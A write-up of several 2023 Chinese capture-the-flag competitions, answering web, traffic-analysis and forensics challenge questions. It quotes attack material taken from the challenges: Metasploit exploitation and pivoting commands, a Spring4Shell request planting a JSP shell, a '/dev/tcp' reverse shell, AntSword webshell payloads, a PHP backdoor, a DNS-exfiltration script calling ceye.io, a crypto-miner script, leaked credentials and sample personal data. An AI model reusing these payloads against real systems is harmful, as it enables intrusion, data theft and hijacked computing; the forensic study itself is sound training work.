2023 CTF part1

in Writeup on Writeup, Ctf

2023年第四届全国电信和互联网行业职业技能竞赛暨第十二届信息通信网络安全管理员职业技能竞赛”全国总决赛

web

use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 11.11.24.9
exploit -j
use post/multi/manage/autoroute
set session 1
exploit
use exploit/linux/http/spring_cloud_gateway_rce
set rhosts 36.10.10.15
set rport 80
set Lhost 36.10.10.1
exploit 

wget http://36.10.10.1:8000/frpc
wget http://36.10.10.1:8000/level1.ini
wget http://36.10.10.1:8000/fscan_amd64
./frpc -c level1.ini &
find / -perm -u=s 2> /dev/null
find / -user root -perm -4000-print 2>/dev/null

python -c 'import pty; pty.spawn("/bin/bash")'

spring.jpa.hibernate.ddl-auto=update
spring.datasource.url=jdbc:mysql://127.0.0.1:3306/AutoTBOXDataSystem?serverTimezone=UTC
spring.datasource.username=root
spring.datasource.password=rojq7863rjibaren13541ot

Active sessions
===============

  Id  Name  Type                      Information                   Connection
  --  ----  ----                      -----------                   ----------
  1         meterpreter x64/linux     root @ localhost.localdomain  172.18.176.102:40805 -> 11.11.24.9:4444 (11.11.24.9)
  3         meterpreter python/linux  root @ localhost.localdomain  36.10.10.1:4446 -> 36.10.10.15:57904 via session 1 (36.10.10.15)

web2

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);
    @array_push($oparr, $ocwd, sys_get_temp_dir());
    foreach ($oparr as $item) {
        if (!@is_writable($item)) {
            continue;
        }
        ;
        $tmdir = $item . "/.6745af25b";
        @mkdir($tmdir);
        if (!@file_exists($tmdir)) {
            continue;
        }
        $tmdir = realpath($tmdir);
        @chdir($tmdir);
        @ini_set("open_basedir",
            "..");
        $cntarr = @preg_split("/\\\\|\//", $tmdir);
        for ($i = 0; $i < sizeof($cntarr); $i++) {
            @chdir("..");
        }
        ;
        @ini_set("open_basedir", "
    /");
        @rmdir($tmdir);
        break;
    }
    ;
}
;
;
function asenc($out)
{
    return @base64_encode($out);
}
;
function
    asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "320b" . "02511";
    echo @asenc($output);
    echo "a824"
        . "6359b";
}
ob_start();
try {
    $D = dirname($_SERVER["SCRIPT_FILENAME"]);
    if (
        $D == ""
    )
        $D = dirname($_SERVER["PATH_TRANSLATED"]);
    $R = "{$D}	";
    if (substr($D, 0, 1) != "/") {
        foreach (range("C", "Z") as $L)
            if (is_dir("{$L}:"))
                $R .= "{$L}:";
    } else {
        $R .= "/";
    }
    $R .= "	"
    ;
    $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
    $s = ($u) ? $u["name"] : @get_current_user();
    $R .= php_uname();
    $R .= "	{$s}"
    ;
    echo $R;
    ;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
}
;
asoutput();
die();

320b02511
/var/www/html	/	Linux 750c427ac37e 5.10.124-linuxkit #1 SMP Thu Jun 30 08:19:10 UTC 2022 x86_64	www-data
a8246359b

```bash
./	2023-11-06 07:09:40	96	0755
../	2020-12-11 07:16:12	4096	0755
index.php	2023-11-06 07:09:49	91	0644

#32
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/html

rev

“第二届“陇剑杯”网络安全大赛预选赛

hard_web

服务器开放了哪些端口,请按照端口大小顺序提交答案,并以英文逗号隔开(如服务器开放了80 81 82 83端口,则答案为80,81,82,83)

服务器中根目录下的flag值是多少?

该webshell的连接密码是多少?

SS

sevrer save

黑客是使用什么漏洞来拿下root权限的。格式为:CVE-2020-114514 本题附件见于平台公告的SS.zip,解压密码为c77ad47ba4c85fae66f08ec12e0085dd

流102

POST /helloworld/greeting HTTP/1.1
Host: 192.168.116.159:8080
User-Agent: python-requests/2.28.2
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 698

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=HTTP/1.1 200 
Content-Type: text/html;charset=UTF-8
Content-Language: en
Transfer-Encoding: chunked
Date: Sat, 22 Jul 2023 11:23:19 GMT
Keep-Alive: timeout=20
Connection: keep-alive

c2
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Reznok's Hello World Spring Application</title>
</head>
<body>
    Hello World! Exploit me!
</body>
</html>
0

Spring框架远程命令执行漏洞_(CNVD-2022-23942,CVE_-2022-22965)

Q: 黑客反弹shell的ip和端口是什么,格式为:10.0.0.1:4444

流106

GET /bbbb.sh HTTP/1.1
User-Agent: Wget/1.21
Accept: */*
Accept-Encoding: identity
Host: 192.168.43.128:8080
Connection: Keep-Alive

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.9.2
Date: Sat, 22 Jul 2023 11:23:46 GMT
Content-type: text/x-sh
Content-Length: 47
Last-Modified: Sat, 22 Jul 2023 09:38:37 GMT

/bin/sh -i >& /dev/tcp/192.168.43.128/2333 0>&1

Q: 黑客的病毒名称是什么? 格式为:filename

/home/guests/main

Q: 黑客的病毒运行后创建了什么用户?请将回答用户名与密码:username:password /etc/passwd /etc/shadow ll:123456

Q: 服务器在被入侵时外网ip是多少? 格式为:10.10.0.1

2023/07/22 11:29:06 Status: success
2023/07/22 11:29:06 Country: Japan
2023/07/22 11:29:06 CountryCode: JP
2023/07/22 11:29:06 Timezone: Asia/Tokyo
2023/07/22 11:29:06 Query: 172.105.202.239
2023/07/22 11:29:06 exec: "setenforce": executable file not found in $PATH
2023/07/22 11:29:06 exec: "ulimit": executable file not found in $PATH
2023/07/22 11:29:06 exec: "ufw": executable file not found in $PATH
2023/07/22 11:29:06 exec: "iptables": executable file not found in $PATH
2023/07/22 11:29:06 exit status 1
2023/07/22 11:29:06 fork/exec sh .idea/mine_doge.sh: no such file or directory

病毒运行后释放了什么文件?格式:文件1,文件2 lolMiner,mine_doge.sh

#!/bin/bash

#################################
## Begin of user-editable part ##
#################################

POOL=doge.millpools.cc:5567
WALLET=DOGE:DRXz1q6ys8Ao2KnPbtb7jQhPjDSqtwmNN9.lolMinerWorker

#################################
##  End of user-editable part  ##
#################################

cd "$(dirname "$0")"

./lolMiner --algo ETHASH --pool $POOL --user $WALLET $@ --4g-alloc-size 4024 --keepfree 8
while [ $? -eq 42 ]; do
    sleep 10s
    ./lolMiner --algo ETHASH --pool $POOL --user $WALLET $@ --4g-alloc-size 4024 --keepfree 8
done

矿池地址是什么? 格式:domain:1234 doge.millpools.cc:5567

黑客的钱包地址是多少?格式:xx:xxxxxxxx DOGE:DRXz1q6ys8Ao2KnPbtb7jQhPjDSqtwmNN9

Wireshark

被入侵主机的IP是? 192.168.246.28

被入侵主机的口令是? youcannevergetthis

用户目录下第二个文件夹的名称是? Downloads

/etc/passwd中倒数第二个用户的用户名是? mysql

IncidentResponse

你是公司的一名安全运营工程师,今日接到外部监管部门通报,你公司网络出口存在请求挖矿域名的行为。需要立即整改。经过与网络组配合,你们定位到了请求挖矿域名的内网IP是10.221.36.21。查询CMDB后得知该IP运行了公司的工时系统。(虚拟机账号密码为:root/IncidentResponsePasswd)

/etc/redis/redis-server

挖矿程序连接的矿池域名是? donate.v2.xmrig.com

攻击者入侵服务器的利用的方法是?

挖矿程序所在路径是? 81.70.166.3

攻击者发起攻击时使用的User-Agent是? Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36

攻击者使用了两种权限维持手段,相应的配置文件路径是?(md5加密后以a开头) /root/.ssh/authorized_keys

攻击者使用了两种权限维持手段,相应的配置文件路径是?(md5加密后以b开头)

SmallSword

连接蚁剑的正确密码是______?(答案示例:123asd)

6ea280898e404bfabd0ebb702327b19f

攻击者留存的值是______?(答案示例:d1c3f0d3-68bb-4d85-a337-fb97cf99ee2e)

ad6269b7-3ce2-4ae8-b97f-f259515e7a91 过滤后的流121

0x72b3f341e432=RDovcGhwU3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3NxbGlpL0xlc3MtNy9oYWNrZXIudHh0&0xe9bb136e8a5e9=YWQ2MjY5YjctM2NlMi00YWU4LWI5N2YtZjI1OTUxNWU3YTkxIA%3D%3D&6ea280898e404bfabd0ebb702327b19f=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Becho%20%22-%3E%7C%22%3Becho%20%40fwrite(fopen(base64_decode(%24_POST%5B%220x72b3f341e432%22%5D)%2C%22w%22)%2Cbase64_decode(%24_POST%5B%220xe9bb136e8a5e9%22%5D))%3F%221%22%3A%220%22%3B%3Becho%20%22%7C%3C-%22%3Bdie()%3B

攻击者下载到的flag是______?(答案示例:flag3{uuid})

流96

6ea280898e404bfabd0ebb702327b19f=@ini_set("display_errors", "0");@set_time_limit(0);echo "->|";$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}	";if(substr($D,0,1)!="/"){foreach(range("A","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="	";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="	{$s}";echo $R;;echo "|<-";die();

0x72b3f341e432="D:/phpStudy/PHPTutorial/WWW/sqlii/Less-7/hacker.txt"&0xe9bb136e8a5e9="Halo ANT!"&6ea280898e404bfabd0ebb702327b19f=@ini_set("display_errors", "0");@set_time_limit(0);echo "->|";echo @fwrite(fopen(base64_decode($_POST["0x72b3f341e432"]),"w"),base64_decode($_POST["0xe9bb136e8a5e9"]))?"1":"0";;echo "|<-";die();

ez_web

服务器自带的后门文件名是什么?(含文件后缀) ViewMore.php

POST /e/public/ViewClick/ViewMore.php HTTP/1.1
Host: 192.168.162.130:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
Origin: http://192.168.162.130:82
Connection: keep-alive
Referer: http://192.168.162.130:82/e/public/ViewClick/ViewMore.php
Cookie: 87f1cb30dabd76bc06b0ef55c92755cd=75cc1f3e-b5df-4515-95a8-2ad4c1b0abd4.4esLyTKflS3qL4XtnkXZVOajfK8
Upgrade-Insecure-Requests: 1

a=file_put_contents%28%27d00r.php%27%2C+base64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs%2FPg%3D%3D%27%29%29%3B

服务器的内网IP是多少? 192.168.101.132

Frame 22253: 859 bytes on wire (6872 bits), 859 bytes captured (6872 bits)
    ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500\n
            inet 192.168.162.130  netmask 255.255.255.0  broadcast 192.168.162.255\n
            inet6 fe80::ae06:234d:1e0a:9aac  prefixlen 64  scopeid 0x20<link>\n
            ether 00:0c:29:08:04:89  txqueuelen 1000  (Ethernet)\n
            RX packets 397410  bytes 398085633 (398.0 MB)\n
            RX errors 0  dropped 0  overruns 0  frame 0\n
            TX packets 140095  bytes 20078864 (20.0 MB)\n
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n
    \n
    ens38: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500\n
            inet 192.168.101.132  netmask 255.255.255.0  broadcast 192.168.101.255\n
            inet6 fe80::68af:1a5:a54c:7366  prefixlen 64  scopeid 0x20<link>\n
            ether 00:0c:29:08:04:93  txqueuelen 1000  (Ethernet)\n
            RX packets 362  bytes 35928 (35.9 KB)\n
            RX errors 0  dropped 0  overruns 0  frame 0\n
            TX packets 1654  bytes 141760 (141.7 KB)\n
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n
    \n

攻击者往服务器中写入的key是什么?

cmd=file_put_contents('k3y_f1le', base64_decode('UEsDBBQAAQAAANgDvlTRoSUSMAAAACQAAAAHAAAAa2V5LnR4dGYJZVtgRzdJtOnW1ycl/O/AJ0rmzwNXxqbCRUq2LQid0gO2yXaPBcc9baLIAwnQ71BLAQI/ABQAAQAAANgDvlTRoSUSMAAAACQAAAAHACQAAAAAAAAAIAAAAAAAAABrZXkudHh0CgAgAAAAAAABABgAOg7Zcnlz2AE6DtlyeXPYAfldXhh5c9gBUEsFBgAAAAABAAEAWQAAAFUAAAAAAA=='));

Frame 23473: 1283 bytes on wire (10264 bits), 1283 bytes captured (10264 bits)
Form item: "cmd" = "system('cat /passwd');"
Frame 23475: 323 bytes on wire (2584 bits), 323 bytes captured (2584 bits)
7e03864b0db7e6f9

baby_forensics

磁盘中的key是多少?

电脑中正在运行的计算器的运行结果是多少?

该内存文件中存在的flag值是多少?

tcpdump

攻击者通过暴力破解进入了某Wiki 文档,请给出登录的用户名与密码,以:拼接,比如admin:admin

No.390420

POST /login HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 35
Content-Type: application/x-www-form-urlencoded

username=TMjpxFGQwD&password=123457
...
{"errCode":200}

攻击者发现软件存在越权漏洞,请给出攻击者越权使用的cookie的内容的md5值。(32位小写)

Cookie: accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=1

攻击使用jdbc漏洞读取了应用配置文件,给出配置中的数据库账号密码,以:拼接,比如root:123456

eq277

datasource:
driverClassName: com.mysql.cj.jdbc.Driver
url: jdbc:mysql://127.0.0.1:3306/zyplayer_doc?useUnicode=true&characterEncoding=utf8&zeroDateTimeBehavior=convertToNull&autoReconnect=true&useSSL=false&rewriteBatchedStatements=true
username: zyplayer
password: 1234567

攻击者又使用了CVE漏洞攻击应用,执行系统命令,请给出此CVE编号以及远程EXP的文件名,使用:拼接,比如CVE-2020-19817:exp.so

CVE-2022-21724:custom.dtd.xml

HTTP/1.1 200 
Content-Type: application/json;charset=UTF-8
Content-Length: 242
Date: Sun, 30 Jul 2023 13:52:42 GMT

{"errCode":300,"errMsg":".......................................jdbc:postgresql://127.0.0.1:5432/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://116.62.63.234:9988/custom.dtd.xml"}

给出攻击者获取系统权限后,下载的工具的名称,比如nmap fscan eq288

bash: cannot set terminal process group (742): Inappropriate ioctl for device
bash: no job control in this shell
web@8209ad3c853c:/app$ ls
...
web@8209ad3c853c:/app$ curl https://github.com/shadow1ng/fscan/releases/download/1.8.2/fscan_amd64 -o /tmp/mysql_bakup

<ases/download/1.8.2/fscan_amd64 -o /tmp/mysql_bakup
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
web@8209ad3c853c:/app$ ls /tmp/mysql_bakup
ls /tmp/mysql_bakup
/tmp/mysql_bakup
web@8209ad3c853c:/app$ file /tmp/mysql_bakup
file /tmp/mysql_bakup
bash: file: command not found
web@8209ad3c853c:/app$

hacked

admIn用户的密码是什么?

crypt_key = 'l36DoqKUYQP0N7e1';
crypt_iv = '131b0c8a7a6e072e';
username=NQq5hKinIsaMmIZ7FCTC0Q%3d%3d&password=KGM7NI0/WvKswK%2bPlmFIhO4gqe8jJzRdOi02GQ0wZoo%3d

flag{WelC0m5_TO_H3re}

app.config[‘SECRET_KEY’]值为多少?

hello! &lt;Config {&#39;ENV&#39;: &#39;production&#39;, &#39;DEBUG&#39;: False, &#39;TESTING&#39;: False, &#39;PROPAGATE_EXCEPTIONS&#39;: None, &#39;PRESERVE_CONTEXT_ON_EXCEPTION&#39;: None, &#39;SECRET_KEY&#39;: &#39;ssti_flask_hsfvaldb&#39;, &#39;PERMANENT_SESSION_LIFETIME&#39;: datetime.timedelta(days=31), &#39;USE_X_SENDFILE&#39;: False, &#39;SERVER_NAME&#39;: None, &#39;APPLICATION_ROOT&#39;: &#39;/&#39;, &#39;SESSION_COOKIE_NAME&#39;: &#39;session&#39;, &#39;SESSION_COOKIE_DOMAIN&#39;: False,

ssti_flask_hsfvaldb

flask网站由哪个用户启动?

攻击者写入的内存马的路由名叫什么?(答案里不需要加/)

GET /Index HTTP/1.1
Host: 192.168.218.132:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session=.eJx1jUsOgkAQBa-Cs2lJCEbdcQI9A0w6DdMaYjPgfAwJmbsLC1fq7r2kKrWo6NlZGlhValmiE7yNrkS8y9iSeMQaENvYS-jt-kDXwC8S0PtG0TSVZAxulovCezhcreEZigw-Q2hoDWUVXFhk3GXH0xnyRhULoONnZB-wCzP6QN0Dqt_9b1AXsMb_8F10jm3AjdApT0mlNx2uUsY.YpIRHQ.qS_PWmxt4i4cjHYBzDz-rUdTZns
Upgrade-Insecure-Requests: 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 10
Server: Werkzeug/2.0.2 Python/3.9.12
Date: Sat, 28 May 2022 12:10:34 GMT

Hello! 123

贵阳大数据及网络安全精英对抗赛-解题赛

wordexcelppt

#misc

题目给了docx,直接解压 发现error.xml。 内容为not_error:+(base64),根据base64的开头iVBORw0KGgoAAAANSUhEUgAAASkAAAEpCAYAAADPmdSCAAAAAXNSR0IArs4c6QAAIABJREFUeF7svfuvLEd1vr 猜测为图片,直接解码获得二维码,再解码二维码获得flag。

easystack

#PWN leak canary -> find base_addr -> stackoverflow -> execute system from glibc

ezre

aes+xor

2023数字中国创新大赛网络数据安全赛道

点击签到

#misc

将点击次数过多的限制去掉,一直点击即可出flag。

hacker

#traffic-analysis

<?php $servername = "127.0.0.1";
$username = "root";
$password = "123456";
$dbname = "zentao";
$conn = new PDO("mysql:host=$servername;dbname=$dbname", $username, $password);
$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$stmt = $conn->prepare("SELECT password FROM zt_user WHERE account=\'admin\'");
$stmt->execute();
$result = $stmt->fetch(PDO::FETCH_ASSOC);
$conn = null;
$param = $_GET["cmd"];
$password = $result["password"];
$output = shell_exec($param);
$hex_output = bin2hex($output);
$hex_password = bin2hex($password);
$len_output = strlen($hex_output);
$len_password = strlen($hex_password);
$max_subdomain_length = 62;
$subdomain_base = "yafgcy.ceye.io";
$hex_xor = "";
for ($i = 0; $i < $len_output; $i) {
    $char_output = $hex_output[$i];
    $char_password = $hex_password[$i % $len_password];
    $char_xor = dechex(hexdec($char_output) ^ hexdec($char_password));
    if (strlen($hex_xor . $char_xor) > $max_subdomain_length) {
        if (strlen($hex_xor) % 2 != 0) {
            $subdomain = "0" . "$hex_xor.$subdomain_base";
        } else {
            $subdomain = "$hex_xor.$subdomain_base";
        }
        gethostbyname($subdomain);
        $hex_xor = "";
    } else {
        $hex_xor .= $char_xor;
    }
}
if (strlen($hex_xor) % 2 != 0) {
    $subdomain = "0" . "$hex_xor.$subdomain_base";
} else {
    $subdomain = "$hex_xor.$subdomain_base";
}
gethostbyname($subdomain); ?>

<?php
// $servername = "127.0.0.1";
// $username   = "root";
// $password   = "123456";
// $dbname     = "zentao";
// $conn       = new PDO("mysql:host=$servername;dbname=$dbname", $username, $password);
// $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// $stmt = $conn->prepare("SELECT+password+FROM+zt_user+WHERE+account=\'admin\'");
// $stmt->execute();
// $result               = $stmt->fetch(PDO::FETCH_ASSOC);
$result["password"] = "8a3e684c923b763d252cf1e8734a7a29";
$conn = null;
// $param = $_GET["cmd"];
$password = $result["password"];
// $output = shell_exec($param);
// $hex_output = bin2hex($output);
$hex_password = bin2hex($password);
// 067879226731756c60206d75703670754e.yafgcy.ceye.io
$hex_output = "59115a4b465044695a5a56015c4252065e501c130e416f5c5647556b510044";
$hex_output .= "505b0e5d4b5f5b5b69505c57074f18430c423f5b0c0852105a521d4409476b5";
$hex_output .= "84a32135c07594c474d4d4a47684453501657411c171e456f4c5f5659043d19";
$hex_output .= "1c495011391d4e40054d495a4368";

// $hex_output = "0059115a";

$hex_output = "79227024716c7522787370254c777230667673222570247b76677322632671";
$hex_output .= "6d7b357226771575227a7372237677702573611f372570317b7672772076206";
$hex_output .= "61479207024777b60247e6674231a626727666171372570317f766773207620";
$hex_output .= "667879226731756c60206d75703670754e";

// $hex_output = "79227024716c7522787370254c777230667673222570247b76677322632671d7b357226771575227a7372237677702573611f372570317b76727720762061479207024777b60247e6674231a626727666171372570317f766773207620067879226731756c60206d75703670754e";
$len_output = strlen($hex_output);
$len_password = strlen($hex_password);
$max_subdomain_length = 62;
$subdomain_base = "yafgcy.ceye.io";
$hex_xor = "";

var_dump($hex_output);
// var_dump(hex2bin($hex_output));

for ($i = 0; $i < $len_output; $i++) {
    $char_output = $hex_output[$i];
    $char_password = $hex_password[$i % $len_password];
    $char_xor = dechex(hexdec($char_output) ^ hexdec($char_password));
    // if (strlen($hex_xor . $char_xor) > $max_subdomain_length) {
    //     if (strlen($hex_xor) % 2 != 0) {
    //         $subdomain = "0" . "$hex_xor.$subdomain_base";
    //     } else {
    //         $subdomain = "$hex_xor.$subdomain_base";
    //     }
    //     gethostbyname($subdomain);
    //     $hex_xor = "";
    // } else {
    // var_dump($char_xor);
    $hex_xor .= $char_xor;
    // }
}

var_dump(hex2bin($hex_xor));
exit();

if (strlen($hex_xor) % 2 != 0) {
    $subdomain = "0" . "$hex_xor.$subdomain_base";
} else {
    $subdomain = "$hex_xor.$subdomain_base";
}
gethostbyname($subdomain);
var_dump($subdomain);
?>

59115a4b465044695a5a56015c4252065e501c130e416f5c5647556b510044 api.php checktable.php data fav 05b0e5d4b5f5b5b69505c57074f18430c423f5b0c0852105a521d4409476b5.yafgcy.ceye.io con.ico index.php ioncube.php 4a32135c07594c474d4d4a47684453501657411c171e456f4c5f5659043d19.yafgcy.ceye.io` 0c495011391d4e40054d495a4368.yafgcy.ceye.io =�ֱ�́լ7�CǷT��Ӧ�D=��!��s robots.txt secret.txt theme x>php xxx1.php

79227024716c7522787370254c777230667673222570247b76677322632671.yafgcy.ceye.io ACCAGTAAAACG{AATTCAACAACATGCTGC

d7b357226771575227a7372237677702573611f372570317b7672772076206.yafgcy.ceye.io

1479207024777b60247e6674231a626727666171372570317f766773207620.yafgcy.ceye.io

067879226731756c60206d75703670754e.yafgcy.ceye.io * * ACC AGT AAA ACG { AAT TCA ACA ACA TGC TGC TCT ACA-AAC AAA AAC AAT-TCA TCA ACA AAT-AAC AAC TGG TGA-TTC f l a g { d 1 e e 6 6 4 e - b a b d 1 1 e d - b b 7 5 - 0 * TTC TCA TGA TGA AAT AAC TTC TTC TGC TGC} 0 1 5 5 d b 0 0 6 6 }

ACC AGT AAA ACG F L A G

ACGT

TAA 0 48 TTA TAC 1 TTC TAG 2 TTG TAT 3 TTT

TCA 4 TAA 0 TCC 5 TAC 1 TCG 6 TAG 2 TCT 7 TAT 3 TGA 8 TCA 4 TGC 9 57 TCC 5 TGG : 58TCG 6 TGT 59 TCT 7 TTA 60 8 TTC = 61 9 TTG TTT

AAA a 97 AAC b AAG c AAT d ACA e ACC f 102 ACG g 103 ACT h AGA i AGC j AGG k AGT l 108 ATA m ATC n ATG o ATT p

ACC AGT AAA ACG { AAT TCA ACA ACA TGC TGC TCT ACA - AAC AAA AAC AAT - TCA TCA ACA AAT - AAC AAC TGG TGA - TTC TTC TCA TGA TGA AAT AAC TTC TTC TGC TGC }

https://github.com/karma9874/DNA-Cipher-Script-CTF

import sys

bin_dna = {'00': 'A', '10': 'C', '01': 'G', '11': 'T'}
mapping = {
    'AAA': 'a', 'AAC': 'b', 'AAG': 'c', 'AAT': 'd', 'ACA': 'e', 'ACC': 'f', 'ACG': 'g', 'ACT': 'h', 'AGA': 'i', 'AGC': 'j', 'AGG': 'k', 'AGT': 'l', 'ATA': 'm', 'ATC': 'n', 'ATG': 'o', 'ATT': 'p', 'CAA': 'q', 'CAC': 'r', 'CAG': 's', 'CAT': 't', 'CCA': 'u', 'CCC': 'v', 'CCG': 'w', 'CCT': 'x', 'CGA': 'y', 'CGC': 'z', 'CGG': 'A', 'CGT': 'B', 'CTA': 'C', 'CTC': 'D', 'CTG': 'E', 'CTT': 'F', 'GAA': 'G', 'GAC': 'H', 'GAG': 'I', 'GAT': 'J', 'GCA': 'K', 'GCC': 'L', 'GCG': 'M', 'GCT': 'N', 'GGA': 'O', 'GGC': 'P', 'GGG': 'Q', 'GGT': 'R', 'GTA': 'S', 'GTC': 'T', 'GTG': 'U', 'GTT': 'V', 'TAA': 'W', 'TAC': 'X', 'TAG': 'Y', 'TAT': 'Z', 'TCA': '1', 'TCC': '2', 'TCG': '3', 'TCT': '4', 'TGA': '5', 'TGC': '6', 'TGG': '7', 'TGT': '8', 'TTA': '9', 'TTC': '0', 'TTG': ' ', 'TTT': '.'}

input_string = open(sys.argv[1]).read().split(" ")
for c in input_string:
    try:
        print(mapping[c], end="")
    except:
        print(c, end="")

flag{d1ee664e-babd-11ed-bb75-00155db0066}

2023数字中国创新大赛网络数据安全赛道|数据安全产业人才能力挑战赛

区块链威胁分析

#traffic-analysis

区块链威胁分析.1

请提交App的Team Identifier。 _CodeSignature\CodeResources W58CYKFH67

区块链威胁分析.2

请提交该App背后的APT组织。 https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-108a

fernet

#traffic-analysis w#### fernet.1 传输信息过程中一共用到了几个key值?

n6IcHjmQUNOd6TxOkV6WRigEPUZFkO2TIu8cS6MRyrE= Aj0S2EgsjOFd_JRsOjcBB_5-fZ1H-9tZVF67-qOWCbw= Z-Ur0AYZQ9-nNO_O6j5B1slASR-YR2tsssycqHNc_so= eBp92fUD7Lk_6qXR2pIjFt3sBH-lW0ul830S-sO6QCQ= Erj5UoZfpxT47Bjpg8qg1XmMCKZyKBj1bJ0otszVZPk= qkwNBcGK7ZcOrlKKcflivlyiatdAsb2u_sH_-IB5R_Y= 0smJ2LvvnQonNICFpjOF8CeuOcMIuYLNVbCDucWSVaw=

fernet.2

hacker获取到的第一个人的信息,其中含有公民个人信息,以得到的顺序,个人信息之间用”_“连接,进行md5加密得到md5值是?

from cryptography.fernet import Fernet as frt
key=b"n6IcHjmQUNOd6TxOkV6WRigEPUZFkO2TIu8cS6MRyrE="
token=b"gAAAAABkGd6MPqsAx8gCzAHJ72NvSvD_uyYEDoWnF3RLX9kD4CdSgmhGZTwIU06vCuMBkuDFnKUJgG5Nxej6osALJ8Et9JdPkA==gAAAAABkGd6YsfP8Z6jHcD9ACUngFJn627q0kiuCnfb1C3RfBUXvB8dFSMdYRU8hbnKMWh2a5EKAFG-7YXizxIbmMWlPbRlV8o0DpgrmKrRlM6WD6HKK59O9q1VrYh--5iUbqY-TyL8g"
s =""
f=frt(key)
output = f.decrypt(token)
output_decoded = output.decode('utf-8')
print ('decrypted: {0}'.format(output_decoded))

I’m a hacker. Next, I want to obtain some data

流3
姓名|性别|身份证号|电话|a|b|c 
张三,男,340303202304025872,13333333333

性别|姓名|身份证号|电话|a|b|c 女,小美,500112202304217984,12222222222,111111111111,22222,333333 bye??

fernet.3

hacker传输的flag的值是多少?

流7
o!I finally want to transmit a flag

